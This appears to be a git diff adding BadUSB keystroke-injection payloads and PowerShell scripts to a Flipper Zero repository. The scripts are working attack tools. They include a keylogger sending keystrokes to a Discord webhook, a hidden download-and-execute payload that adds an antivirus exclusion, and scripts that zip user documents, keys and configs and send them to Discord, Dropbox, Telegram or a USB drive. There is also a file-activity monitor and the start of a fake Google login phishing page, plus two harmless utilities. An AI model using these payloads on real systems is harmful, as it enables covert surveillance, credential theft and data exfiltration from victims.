+ $keyst = $API::GetAsyncKeyState($asc)
+ # If a key is pressed
+ if ($keyst -eq -32767) {
+ # Restart the inactivity timer
+ $keyPressed = $true
+ $LastKeypressTime.Restart()
+ $null = [console]::CapsLock
+ # Translate the keycode to a letter
+ $vtkey = $API::MapVirtualKey($asc, 3)
+ # Get the keyboard state and create stringbuilder
+ $kbst = New-Object Byte[] 256
+ $checkkbst = $API::GetKeyboardState($kbst)
+ $logchar = New-Object -TypeName System.Text.StringBuilder
+ # Define the key that was pressed
+ if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) {
+ # Check for non-character keys
+ $LString = $logchar.ToString()
+ if ($asc -eq 8) {$LString = "[BKSP]"}
+ if ($asc -eq 13) {$LString = "[ENT]"}
+ if ($asc -eq 27) {$LString = "[ESC]"}
+ # Add the key to sending variable
+ $send += $LString
+ }
+ }
+ }
+ }
+ }
+ finally{
+ If ($keyPressed) {
+ # Send the saved keys to a webhook
+ $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')}
+ $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss"
+ $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`'
+ $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json
+ Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys
+ #Remove log file and reset inactivity check
+ $send = ""
+ $keyPressed = $false
+ }
+ }
+ # reset stopwatch before restarting the loop
+ $LastKeypressTime.Restart()
+ Start-Sleep -Milliseconds 10
+}
diff --git a/Download-and-Execute/Download-Execute.txt b/Download-and-Execute/Download-Execute.txt
new file mode 100644
index 0000000..393ace0
--- /dev/null
+++ b/Download-and-Execute/Download-Execute.txt
@@ -0,0 +1,22 @@
+REM Title: Download-Execute from Run Prompt
+REM Author: @beigeworm | https://github.com/beigeworm
+REM Description: Uses the Run Prompt to download a file and run it.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace FILE_URL_HERE with the url of your file to run.
+
+REM some setup for dukie script.
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window).
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1;
+
+REM replace FILE_URL_HERE below.
+STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit
+
+CTRL-SHIFT ENTER
+DELAY 3000
+ALT y
diff --git a/Download-and-Execute/README.md b/Download-and-Execute/README.md
new file mode 100644
index 0000000..08019e4
--- /dev/null
+++ b/Download-and-Execute/README.md
@@ -0,0 +1,11 @@
+
+
Download and Execute exe files
+
+SYNOPSIS
+
+Uses the Run Prompt to download a file and run it.
+
+USAGE
+
+replace FILE_URL_HERE with the url of your file to run.
+Run script on target Windows system.
diff --git a/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt b/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt
new file mode 100644
index 0000000..ceccc3e
--- /dev/null
+++ b/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt
@@ -0,0 +1,19 @@
+
+REM Title: beigeworm's Exfiltrate files to Discord
+REM Author: @beigeworm
+REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a Discord Webhook.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace WEBHOOK_HERE with your Discord Webhook.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; irm https://is.gd/bw_ex_to_dc | iex
+ENTER
+
diff --git a/Exfiltrate-to-Discord/README.md b/Exfiltrate-to-Discord/README.md
new file mode 100644
index 0000000..8d01ea9
--- /dev/null
+++ b/Exfiltrate-to-Discord/README.md
@@ -0,0 +1,12 @@
+
+
Exfiltrate Files to Discord
+
+SYNOPSIS
+
+This script searches the user folders for specific filetypes to upload to Discord zipped.
+
+SETUP
+
+Create a webhook in a discord server channel settings.
+Replace WEBHOOK_HERE with your webhook.
+
diff --git a/Exfiltrate-to-Discord/main.ps1 b/Exfiltrate-to-Discord/main.ps1
new file mode 100644
index 0000000..df3efa2
--- /dev/null
+++ b/Exfiltrate-to-Discord/main.ps1
@@ -0,0 +1,53 @@
+$hookurl = "$dc"
+
+Function Exfiltrate {
+
+param ([string[]]$FileType,[string[]]$Path)
+$maxZipFileSize = 25MB
+$currentZipSize = 0
+$index = 1
+$zipFilePath ="$env:temp/Loot$index.zip"
+
+If($Path -ne $null){
+$foldersToSearch = "$env:USERPROFILE\"+$Path
+}else{
+$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")
+}
+
+If($FileType -ne $null){
+$fileExtensions = "*."+$FileType
+}else {
+$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")
+}
+
+Add-Type -AssemblyName System.IO.Compression.FileSystem
+$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
+
+foreach ($folder in $foldersToSearch) {
+ foreach ($extension in $fileExtensions) {
+ $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse
+ foreach ($file in $files) {
+ $fileSize = $file.Length
+ if ($currentZipSize + $fileSize -gt $maxZipFileSize) {
+ $zipArchive.Dispose()
+ $currentZipSize = 0
+ curl.exe -F file1=@"$zipFilePath" $hookurl
+ Remove-Item -Path $zipFilePath -Force
+ Sleep 1
+ $index++
+ $zipFilePath ="$env:temp/Loot$index.zip"
+ $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
+ }
+ $entryName = $file.FullName.Substring($folder.Length + 1)
+ [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName)
+ $currentZipSize += $fileSize
+ }
+ }
+}
+$zipArchive.Dispose()
+curl.exe -F file1=@"$zipFilePath" $hookurl
+Remove-Item -Path $zipFilePath -Force
+Write-Output "$env:COMPUTERNAME : Exfiltration Complete."
+}
+
+Exfiltrate
diff --git a/Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.txt b/Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.txt
new file mode 100644
index 0000000..1d25265
--- /dev/null
+++ b/Exfiltrate-to-Dropbox/Exfiltrate-to-Dropbox.txt
@@ -0,0 +1,19 @@
+
+REM Title: beigeworm's Exfiltrate files to Dropbox
+REM Author: @beigeworm
+REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace DROPBOX_TOKEN with your Dropbox Token.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Dropbox/main.ps1 | iex
+ENTER
+
diff --git a/Exfiltrate-to-Dropbox/README.md b/Exfiltrate-to-Dropbox/README.md
new file mode 100644
index 0000000..f189bdf
--- /dev/null
+++ b/Exfiltrate-to-Dropbox/README.md
@@ -0,0 +1,19 @@
+
+
Exfiltrate Files to Dropbox
+
+SYNOPSIS
+
+Uses Powershell to Exfiltrate all files of all specified filetypes to a DropBox account.
+
+SETUP
+
+make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app)
+generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE.
+
+USAGE
+
+1. Input your credentials below
+2. Run Script on target System
+3. Check Discord for results
+
+#>
\ No newline at end of file
diff --git a/Exfiltrate-to-Dropbox/main.ps1 b/Exfiltrate-to-Dropbox/main.ps1
new file mode 100644
index 0000000..be42638
--- /dev/null
+++ b/Exfiltrate-to-Dropbox/main.ps1
@@ -0,0 +1,31 @@
+$accessToken = "$db"
+$localFolderPath = "$env:USERPROFILE"
+
+$computerName = "$env:COMPUTERNAME"
+$computerNameAsString = $computerName.ToString()
+$dropboxCreateFolderUrl = "https://api.dropboxapi.com/2/files/create_folder_v2"
+
+$dropboxFolderPath = $computerName.ToString()
+$dropboxUploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+$headers = @{
+ "Authorization" = "Bearer $accessToken"
+ "Content-Type" = "application/octet-stream"
+}
+$body = @{
+ "path" = "/$computerName"
+ "autorename" = $true
+} | ConvertTo-Json
+
+$files = Get-ChildItem -Path $localFolderPath -Include "*.docx","*.txt","*.pdf","*.jpg","*.png" -Recurse
+
+foreach ($file in $files) {
+ $relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\')
+ $dropboxFilePath = "$dropboxFolderPath/$relativePath".Replace('\', '/')
+ $headers["Dropbox-API-Arg"] = "{`"path`": `"/$dropboxFilePath`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}"
+ try {
+ $fileBytes = [System.IO.File]::ReadAllBytes($file.FullName)
+ $response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes
+ }
+ catch {}
+}
diff --git a/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt
new file mode 100644
index 0000000..7de79ae
--- /dev/null
+++ b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt
@@ -0,0 +1,19 @@
+
+REM Title: beigeworm's Exfiltrate files to Telegram
+REM Author: @beigeworm
+REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace TELEGRAM_TOKEN with your Telegram Token.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-Telegram/main.ps1 | iex
+ENTER
+
diff --git a/Exfiltrate-to-Telegram/README.md b/Exfiltrate-to-Telegram/README.md
new file mode 100644
index 0000000..1bb93b2
--- /dev/null
+++ b/Exfiltrate-to-Telegram/README.md
@@ -0,0 +1,14 @@
+
+
Exfiltrate Files to Telegram
+
+SYNOPSIS
+
+This script connects target computer with a telegram chat to upload certain files to telegram .
+
+SETUP INSTRUCTIONS
+
+1. visit https://t.me/botfather and make a bot.
+2. add bot api to script.
+3. search for bot in top left box in telegram and start a chat then type /start.
+4. Replace TELEGRAM_TOKEN with your token
+5. Run Script on target System
\ No newline at end of file
diff --git a/Exfiltrate-to-Telegram/main.ps1 b/Exfiltrate-to-Telegram/main.ps1
new file mode 100644
index 0000000..ef5029b
--- /dev/null
+++ b/Exfiltrate-to-Telegram/main.ps1
@@ -0,0 +1,68 @@
+$Token = "$tg"
+$URL='https://api.telegram.org/bot{0}' -f $Token
+
+while($chatID.length -eq 0){
+$updates = Invoke-RestMethod -Uri ($url + "/getUpdates")
+if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1]
+if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}}
+Sleep 10
+}
+
+Function Exfiltrate {
+
+param ([string[]]$FileType,[string[]]$Path)
+$maxZipFileSize = 50MB
+$currentZipSize = 0
+$index = 1
+$zipFilePath ="$env:temp/Loot$index.zip"
+$MessageToSend = New-Object psobject
+$MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID
+$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." -Force
+irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json"
+
+If($Path -ne $null){
+$foldersToSearch = "$env:USERPROFILE\"+$Path
+}else{
+$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")
+}
+
+If($FileType -ne $null){
+$fileExtensions = "*."+$FileType
+}else {
+$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")
+}
+
+Add-Type -AssemblyName System.IO.Compression.FileSystem
+$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
+$escmsg = "Files from : "+$env:COMPUTERNAME
+
+foreach ($folder in $foldersToSearch) {
+ foreach ($extension in $fileExtensions) {
+ $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse
+ foreach ($file in $files) {
+ $fileSize = $file.Length
+ if ($currentZipSize + $fileSize -gt $maxZipFileSize) {
+ $zipArchive.Dispose()
+ $currentZipSize = 0
+ curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument"
+ Remove-Item -Path $zipFilePath -Force
+ Sleep 1
+ $index++
+ $zipFilePath ="$env:temp/Loot$index.zip"
+ $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')
+ }
+ $entryName = $file.FullName.Substring($folder.Length + 1)
+ [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName)
+ $currentZipSize += $fileSize
+ }
+ }
+}
+$zipArchive.Dispose()
+curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument"
+Remove-Item -Path $zipFilePath -Force
+Write-Output "$env:COMPUTERNAME : Exfiltration Complete."
+}
+
+
+# Define What you want to search for (examples at the top)
+Exfiltrate -Path documents -FileType log
diff --git a/Exfiltrate-to-USB/Exfiltrate-to-USB.txt b/Exfiltrate-to-USB/Exfiltrate-to-USB.txt
new file mode 100644
index 0000000..39781a8
--- /dev/null
+++ b/Exfiltrate-to-USB/Exfiltrate-to-USB.txt
@@ -0,0 +1,16 @@
+
+REM Title: beigeworm's Exfiltrate files USB Drive
+REM Author: @beigeworm
+REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to newly connected USB drive.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-USB/main.ps1 | iex
+ENTER
+
diff --git a/Exfiltrate-to-USB/README.md b/Exfiltrate-to-USB/README.md
new file mode 100644
index 0000000..21c8219
--- /dev/null
+++ b/Exfiltrate-to-USB/README.md
@@ -0,0 +1,15 @@
+
+
Exfiltrate Files to USB
+
+SYNOPSIS
+
+Waits for a new USB Storage device to be connected and then copies many user files to that USB drive.
+
+USAGE
+
+1. Run the script.
+2. Choose if you want to hide the console window (silent mode)
+3. Connect a USB Drive to the computer
+4. Copying files will automatically begin to the newly connected drive
+5. 'Completed' message will appear when finished (hidden mode only)
+
diff --git a/Exfiltrate-to-USB/main.ps1 b/Exfiltrate-to-USB/main.ps1
new file mode 100644
index 0000000..cadfe30
--- /dev/null
+++ b/Exfiltrate-to-USB/main.ps1
@@ -0,0 +1,78 @@
+
+[Console]::BackgroundColor = "Black"
+[Console]::SetWindowSize(57, 5)
+[Console]::Title = "Exfiltration"
+Clear-Host
+
+$hidden = Read-Host "Would you like to hide this console window? (Y/N)"
+$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 }
+$count = $removableDrives.count
+$i = 10
+
+While ($true){
+ cls
+ Write-Host "Connect a Device.. ($i)" -ForegroundColor Yellow
+ $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 }
+ sleep 1
+ if (!($count -eq $removableDrives.count)){
+ Write-Host "USB Drive Connected!" -ForegroundColor Green
+ break
+ }
+ $i--
+ if ($i -eq 0 ){
+ Write-Host "Timeout! Exiting" -ForegroundColor Red
+ sleep 1
+ exit
+ }
+}
+
+[Console]::SetWindowSize(80, 30)
+
+$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1
+$driveLetter = $drive.DeviceID
+Write-Host "Loot Drive Set To : $driveLetter/" -ForegroundColor Green
+$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")
+$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")
+$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot"
+
+if (-not (Test-Path -Path $destinationPath)) {
+ New-Item -ItemType Directory -Path $destinationPath -Force
+ Write-Host "New Folder Created : $destinationPath" -ForegroundColor Green
+}
+
+If ($hidden -eq 'y'){
+ Write-Host "Hiding the Window.." -ForegroundColor Red
+ sleep 1
+ $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
+ $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
+ $hwnd = (Get-Process -PID $pid).MainWindowHandle
+ if($hwnd -ne [System.IntPtr]::Zero){
+ $Type::ShowWindowAsync($hwnd, 0)
+ }
+ else{
+ $Host.UI.RawUI.WindowTitle = 'hideme'
+ $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' })
+ $hwnd = $Proc.MainWindowHandle
+ $Type::ShowWindowAsync($hwnd, 0)
+ }
+}
+
+foreach ($folder in $foldersToSearch) {
+ Write-Host "Searching in $folder" -ForegroundColor Yellow
+
+ foreach ($extension in $fileExtensions) {
+ $files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File
+
+ foreach ($file in $files) {
+ $destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name
+ Write-Host "Copying $($file.FullName) to $($destinationFile)" -ForegroundColor Gray
+ Copy-Item -Path $file.FullName -Destination $destinationFile -Force
+ }
+ }
+}
+If ($hidden -eq 'y'){
+ (New-Object -ComObject Wscript.Shell).Popup("File Exfiltration Complete",5,"Exfiltration",0x0)
+}
+else{
+ Write-Host "File Exfiltration Complete" -ForegroundColor Green
+}
diff --git a/File-Monitor-to-Discord/File-Changes-to-Discord.txt b/File-Monitor-to-Discord/File-Changes-to-Discord.txt
new file mode 100644
index 0000000..831da7b
--- /dev/null
+++ b/File-Monitor-to-Discord/File-Changes-to-Discord.txt
@@ -0,0 +1,20 @@
+
+REM Title: beigeworm's monitor file changes to Discord Webhook.
+REM Author: @beigeworm
+REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex
+ENTER
+
+
diff --git a/File-Monitor-to-Discord/README.md b/File-Monitor-to-Discord/README.md
new file mode 100644
index 0000000..92a7adc
--- /dev/null
+++ b/File-Monitor-to-Discord/README.md
@@ -0,0 +1,10 @@
+
+
Filesystem Monitor to discord
+
+SYNOPSIS
+
+This script gathers information about any changes to any files in the "%USERPROFILE% folder".
+
+USAGE
+2. Run Script on target System
+3. Check temp folder for results
diff --git a/File-Monitor-to-Discord/main.ps1 b/File-Monitor-to-Discord/main.ps1
new file mode 100644
index 0000000..1021f6a
--- /dev/null
+++ b/File-Monitor-to-Discord/main.ps1
@@ -0,0 +1,35 @@
+$whuri = "$dc"
+
+$watcher = New-Object System.IO.FileSystemWatcher -Property @{
+ Path = $env:USERPROFILE + '\'
+}
+$watcher.NotifyFilter = [System.IO.NotifyFilters]::FileName -bor `
+ [System.IO.NotifyFilters]::LastWrite -bor `
+ [System.IO.NotifyFilters]::DirectoryName
+
+$action = {
+ $event = $EventArgs
+ $path = $event.FullPath
+ $changeType = $event.ChangeType
+ $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
+
+ $msgsys = "[$timestamp] File $changeType > $path"
+ $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')}
+ $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json
+ Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys
+
+}
+
+Register-ObjectEvent -InputObject $watcher -EventName Created -Action $action
+Register-ObjectEvent -InputObject $watcher -EventName Deleted -Action $action
+Register-ObjectEvent -InputObject $watcher -EventName Changed -Action $action
+
+$watcher.EnableRaisingEvents = $true
+
+while ($true) {
+ Start-Sleep -Milliseconds 500
+}
+
+Unregister-Event -InputObject $watcher -EventName Created -Action $action
+Unregister-Event -InputObject $watcher -EventName Deleted -Action $action
+Unregister-Event -InputObject $watcher -EventName Changed -Action $action
diff --git a/Filetype-Organizer/Filetype-Organizer.txt b/Filetype-Organizer/Filetype-Organizer.txt
new file mode 100644
index 0000000..370d02a
--- /dev/null
+++ b/Filetype-Organizer/Filetype-Organizer.txt
@@ -0,0 +1,16 @@
+
+REM Title: Filetype Organizer
+REM Author: @beigeworm
+REM Description: This script searches the users folder for any files with a specific filetype and copies them to the user folder.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C cd $env:USERPROFILE ;irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Filetype-Organizer/main.ps1 | iex
+ENTER
+
diff --git a/Filetype-Organizer/README.md b/Filetype-Organizer/README.md
new file mode 100644
index 0000000..72e161a
--- /dev/null
+++ b/Filetype-Organizer/README.md
@@ -0,0 +1,11 @@
+
+
Search Folders For Filetypes
+
+SYNOPSIS
+
+Searches User folder for any files with specific filetype and copies them.
+
+USAGE
+
+1. Run Script.
+2. follow instructions in the console.
\ No newline at end of file
diff --git a/Filetype-Organizer/main.ps1 b/Filetype-Organizer/main.ps1
new file mode 100644
index 0000000..65be957
--- /dev/null
+++ b/Filetype-Organizer/main.ps1
@@ -0,0 +1,64 @@
+
+$Host.UI.RawUI.BackgroundColor = "Black"
+Clear-Host
+$width = 88
+$height = 30
+[Console]::SetWindowSize($width, $height)
+$windowTitle = " BeigeTools | Filetype Organizer"
+[Console]::Title = $windowTitle
+Write-Host "=======================================================================================" -ForegroundColor Green
+Write-Host "============================= BeigeTools | Filetype Organizer =================================" -ForegroundColor Green
+Write-Host "=======================================================================================`n" -ForegroundColor Green
+Write-Host "More info at : https://github.com/beigeworm" -ForegroundColor DarkGray
+Write-Host "Starts a GUI window to select a folder, then search for every file with a selected filetype and output to respective named files in the root folder.`n"
+
+# Get the directory of the script
+$scriptDirectory = Split-Path -Parent $MyInvocation.MyCommand.Definition
+
+# Prompt user for file extensions
+$fileExtensions = Read-Host "Enter file extensions separated by commas (e.g., jpg,mp4,png)"
+
+# Convert the input into an array
+$fileExtensionsArray = $fileExtensions -split ','
+
+# Prompt user for folder to search recursively
+$folderPath = Read-Host "Enter the folder path to search recursively"
+
+# Prompt user to choose between move or copy
+$operation = Read-Host "Enter 'M' to move files, 'C' to copy files"
+
+# Validate the user input for the operation
+if ($operation -ne 'M' -and $operation -ne 'C') {
+ Write-Host "Invalid operation. Please enter 'M' for move or 'C' for copy."
+ exit
+}
+
+# Create output folders in the script directory
+foreach ($extension in $fileExtensionsArray) {
+ $folderName = $extension.Trim()
+ $folderPathForExtension = Join-Path $scriptDirectory $folderName
+ New-Item -ItemType Directory -Path $folderPathForExtension -Force
+}
+
+# Search for files and move/copy to appropriate folders
+foreach ($extension in $fileExtensionsArray) {
+ $files = Get-ChildItem -Path $folderPath -Recurse -Include "*.$extension"
+
+ foreach ($file in $files) {
+ $destinationFolder = Join-Path $scriptDirectory $extension.Trim()
+
+ if ($operation -eq 'M') {
+ $ind = $file.FullName
+ Move-Item $file.FullName -Destination $destinationFolder -Force
+ Write-Host "Moved : $ind"
+
+ } elseif ($operation -eq 'C') {
+ $ind = $file.FullName
+ Copy-Item $file.FullName -Destination $destinationFolder -Force
+ Write-Host "Copied : $ind"
+ }
+ }
+}
+
+Write-Host "Operation Complete." -ForegroundColor Green
+pause
\ No newline at end of file
diff --git a/GIF-Player/Gif-Player.txt b/GIF-Player/Gif-Player.txt
new file mode 100644
index 0000000..7769ab3
--- /dev/null
+++ b/GIF-Player/Gif-Player.txt
@@ -0,0 +1,16 @@
+REM Title: beigeworm's GIF Player.
+REM Author: @beigeworm
+REM Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/GIF-Player/main.ps1 | iex
+ENTER
+
+
diff --git a/GIF-Player/README.md b/GIF-Player/README.md
new file mode 100644
index 0000000..bad8338
--- /dev/null
+++ b/GIF-Player/README.md
@@ -0,0 +1,10 @@
+
+
GIF Player in Powershell
+
+SYNOPSIS
+
+This Script downloads a GIF from Giphy and plays it in a GUI window.
+
+USAGE
+
+1. Run this script in powershell
diff --git a/GIF-Player/main.ps1 b/GIF-Player/main.ps1
new file mode 100644
index 0000000..6c67432
--- /dev/null
+++ b/GIF-Player/main.ps1
@@ -0,0 +1,45 @@
+Add-Type -AssemblyName System.Windows.Forms
+Add-Type -AssemblyName System.Drawing
+[System.Windows.Forms.Application]::EnableVisualStyles()
+
+$url = "https://media3.giphy.com/media/tJqyalvo9ahykfykAj/giphy.gif?ep=v1_gifs_search" # example GIF (replace with your own link)
+$gifPath = "$env:temp/g.gif"
+iwr -Uri $url -OutFile $gifPath
+$ErrorActionPreference = 'Stop'
+
+function Play-Gif {
+ param(
+ [string]$GifPath
+ )
+
+ $form = New-Object System.Windows.Forms.Form
+ $pictureBox = New-Object System.Windows.Forms.PictureBox
+ $timer = New-Object System.Windows.Forms.Timer
+
+ $form.Text = "GIF Player"
+ $form.Size = New-Object System.Drawing.Size(490, 300)
+ $form.StartPosition = 'CenterScreen'
+ $form.Topmost = $true
+
+ $pictureBox.Size = $form.Size
+ $pictureBox.Image = [System.Drawing.Image]::FromFile($GifPath)
+
+ $timer.Interval = 50 # Adjust the interval as needed for desired animation speed
+ $timer.Add_Tick({
+ $pictureBox.Image.SelectActiveFrame([System.Drawing.Imaging.FrameDimension]::Time, $timer.Tag)
+ $pictureBox.Refresh()
+ $timer.Tag = ($timer.Tag + 1) % $pictureBox.Image.GetFrameCount([System.Drawing.Imaging.FrameDimension]::Time)
+ })
+
+ $timer.Tag = 0
+
+ $form.Controls.Add($pictureBox)
+
+ $form.Add_Shown({ $timer.Start() })
+
+ $form.ShowDialog()
+}
+
+Play-Gif -GifPath $gifPath
+sleep 1
+Remove-Item $gifPath
diff --git a/Google-Phishing/Google-Phish-to-Discord.txt b/Google-Phishing/Google-Phish-to-Discord.txt
new file mode 100644
index 0000000..ec2c51a
--- /dev/null
+++ b/Google-Phishing/Google-Phish-to-Discord.txt
@@ -0,0 +1,20 @@
+
+REM Title: beigeworm's Fake Google Phishing page to Discord Webhook.
+REM Author: @beigeworm
+REM Description: This script makes a Fake Google Phishing page and posts results to a discord webhook.
+REM Target: Windows 10
+
+REM *SETUP*
+REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove -W Hidden to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_gp_to_dc | iex
+ENTER
+
+
diff --git a/Google-Phishing/README.md b/Google-Phishing/README.md
new file mode 100644
index 0000000..98e1483
--- /dev/null
+++ b/Google-Phishing/README.md
@@ -0,0 +1,11 @@
+
+
Google Sign in to Discord
+
+SYNOPSIS
+
+Uses Powershell and HTML to create a fake google login page which catches login credentials and sends them to a webhook.
+
+USAGE
+
+1. Replace YOUR_WEBBHOOK_HERE with your webhook
+2. Run script on target system.
diff --git a/Google-Phishing/main.ps1 b/Google-Phishing/main.ps1
new file mode 100644
index 0000000..a910b3d
--- /dev/null
+++ b/Google-Phishing/main.ps1
@@ -0,0 +1,274 @@
+#========================================== WINDOW ONE (SETUP) =====================================================
+Add-Type -AssemblyName System.Windows.Forms
